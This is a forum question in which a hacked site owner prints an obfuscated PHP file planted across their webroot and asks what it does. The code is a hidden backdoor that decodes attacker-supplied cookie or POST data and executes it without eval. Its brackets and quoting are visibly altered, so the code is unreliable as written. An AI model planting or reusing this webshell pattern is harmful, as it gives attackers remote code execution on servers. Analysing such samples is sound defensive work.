webserver – What does this potentially malicious php code do?

Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and – even though I managed to beautify it – I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the $_POST and $_COOKIE variables, but what I find very interesting is the lack of any eval calls, the function is even deactivated in my php.ini.

Anyway here’s the code and I’d appreciate any kind of insights:

<?php
$wldxznb = 'r5a3m#uvplebgsH'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj() = $wldxznb(16) . $wldxznb(0) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25) . $wldxznb(10) . $wldxznb(23) . $wldxznb(30) . $wldxznb(6) . $wldxznb(29) . $wldxznb(16) . $wldxznb(25) . $wldxznb(20) . $wldxznb(17) . $wldxznb(29);
$vcekj() = $wldxznb(14) . $wldxznb(18);
$vcekj() = $wldxznb(1) . $wldxznb(16) . $wldxznb(21) . $wldxznb(30) . $wldxznb(10) . $wldxznb(34) . $wldxznb(10) . $wldxznb(16) . $wldxznb(22) . $wldxznb(10) . $wldxznb(21) . $wldxznb(27) . $wldxznb(32) . $wldxznb(22) . $wldxznb(28) . $wldxznb(30) . $wldxznb(16) . $wldxznb(2) . $wldxznb(22) . $wldxznb(11) . $wldxznb(11) . $wldxznb(27) . $wldxznb(19) . $wldxznb(22) . $wldxznb(3) . $wldxznb(27) . $wldxznb(1) . $wldxznb(11) . $wldxznb(28) . $wldxznb(34) . $wldxznb(34) . $wldxznb(24) . $wldxznb(2) . $wldxznb(34) . $wldxznb(19) . $wldxznb(34);
$vcekj() = $wldxznb(5);
$vcekj() = $wldxznb(16) . $wldxznb(17) . $wldxznb(6) . $wldxznb(29) . $wldxznb(25);
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(23) . $wldxznb(0) . $wldxznb(10) . $wldxznb(8) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25);
$vcekj() = $wldxznb(10) . $wldxznb(26) . $wldxznb(8) . $wldxznb(9) . $wldxznb(17) . $wldxznb(34) . $wldxznb(10);
$vcekj() = $wldxznb(13) . $wldxznb(6) . $wldxznb(11) . $wldxznb(13) . $wldxznb(25) . $wldxznb(0);
$vcekj() = $wldxznb(2) . $wldxznb(0) . $wldxznb(0) . $wldxznb(2) . $wldxznb(33) . $wldxznb(23) . $wldxznb(4) . $wldxznb(10) . $wldxznb(0) . $wldxznb(12) . $wldxznb(10);
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(9) . $wldxznb(10) . $wldxznb(29);
$vcekj() = $wldxznb(8) . $wldxznb(2) . $wldxznb(16) . $wldxznb(31);
foreach ($vcekj(8)($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
    function wwdlf($vcekj, $wxusr, $qwdotr)
    {
        return $vcekj(7)($vcekj(5)($wxusr . $vcekj(2), ($qwdotr / $vcekj(9)($wxusr)) + 1) , 0, $qwdotr);
    }
    function irngfrj($vcekj, $axsex)
    {
        return @$vcekj(10)($vcekj(1), $axsex);
    }
    function vadod($vcekj, $axsex)
    {
        $onlwwe = $vcekj(4)($axsex) % 3;
        if (!$onlwwe)
        {
            $zznqw = $vcekj(0);
            $juptpoi = $zznqw("", $axsex(1)($axsex(2)));
            $juptpoi();
            exit();
        }
    }
    $pjrusp = irngfrj($vcekj, $pjrusp);
    vadod($vcekj, $vcekj(6)($vcekj(3), $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj(9)($pjrusp))));
}